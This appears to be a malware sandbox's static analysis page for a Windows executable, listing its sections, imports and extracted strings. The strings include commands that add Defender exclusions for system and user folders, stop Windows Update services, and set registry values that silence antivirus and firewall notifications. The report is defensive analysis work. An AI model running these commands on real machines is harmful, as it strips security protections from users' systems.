Static | ZeroBOX

PE Compile Time

2024-07-25 07:25:44

PE Imphash

22c0c61660a8e80d6f4e2f4b1206b0d6

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000e04 0x00001000 5.39165486884
.rdata 0x00002000 0x00000fbc 0x00001000 4.3723545922
.data 0x00003000 0x0000038c 0x00000200 0.352759488216
.rsrc 0x00004000 0x000002a8 0x00000400 5.18167474592
.reloc 0x00005000 0x0000026e 0x00000400 4.26994449166

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00004058 0x00000250 LANG_ENGLISH SUBLANG_ENGLISH_US ASCII text, with CRLF line terminators

Imports

Library MSVCR90.dll:
0x402054 _onexit
0x402058 _decode_pointer
0x402060 _lock
0x402064 _controlfp_s
0x402068 _crt_debugger_hook
0x40206c __dllonexit
0x402070 _unlock
0x402074 ?terminate@@YAXXZ
0x402078 __set_app_type
0x40207c _encode_pointer
0x402080 __p__fmode
0x402084 __p__commode
0x402088 _adjust_fdiv
0x40208c __setusermatherr
0x402090 _configthreadlocale
0x402094 _initterm_e
0x402098 _initterm
0x40209c _acmdln
0x4020a0 _ismbblead
0x4020a4 exit
0x4020a8 _XcptFilter
0x4020ac _exit
0x4020b0 _cexit
0x4020b4 __getmainargs
0x4020b8 _invoke_watson
0x4020bc _amsg_exit
Library KERNEL32.dll:
0x40201c GetCurrentProcess
0x402020 TerminateProcess
0x402028 GetCurrentProcessId
0x40202c GetCurrentThreadId
0x402030 GetTickCount
0x40203c GetStartupInfoA
0x402044 InterlockedExchange
0x402048 Sleep
0x40204c IsDebuggerPresent
Library ADVAPI32.dll:
0x402000 RegSetValueExA
0x402004 RegCloseKey
0x402008 RegCreateKeyExW
0x40200c RegOpenKeyExA
0x402010 RegOpenKeyExW
Library SHELL32.dll:
0x4020c4 ShellExecuteW

!This program cannot be run in DOS mode.
/o3+/n3
/n3Rich
`.rdata
@.data
@.reloc
CheckedValue
DisableWindowsUpdateAccess
DisableWindowsUpdateAccess
NoAutoUpdate
NoAutoUpdate
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
_amsg_exit
__getmainargs
_cexit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
?terminate@@YAXXZ
MSVCR90.dll
_unlock
__dllonexit
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
_crt_debugger_hook
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
KERNEL32.dll
RegOpenKeyExA
RegCreateKeyExW
RegCloseKey
RegSetValueExA
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
02070<0D0M0R0W0_0o0z0
1%151@1S1]1g1w1
2#2-2B2M2i2s2}2
3!3=3G3Q3a3l3
4)434B4L4[4e4t4~4
5(575A5P5Z5i5s5
6#6-6G6Q6d6n6s6x6
6$7.747>7W7
7.848<8C8H8N8T8\8b8i8p8
9"969K9V9n9
;p;v;};
;1<T<a<m<u<}<
="=)=0=7=>=E=L=S=[=c=k=w=
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmd.exe
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmd.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
SYSTEM\CurrentControlSet\Services\UsoSvc
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc
SYSTEM\CurrentControlSet\Services\wuauserv
SYSTEM\CurrentControlSet\Services\DoSvc
SYSTEM\CurrentControlSet\Services\BITS
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
No antivirus signatures available.
No IRMA results available.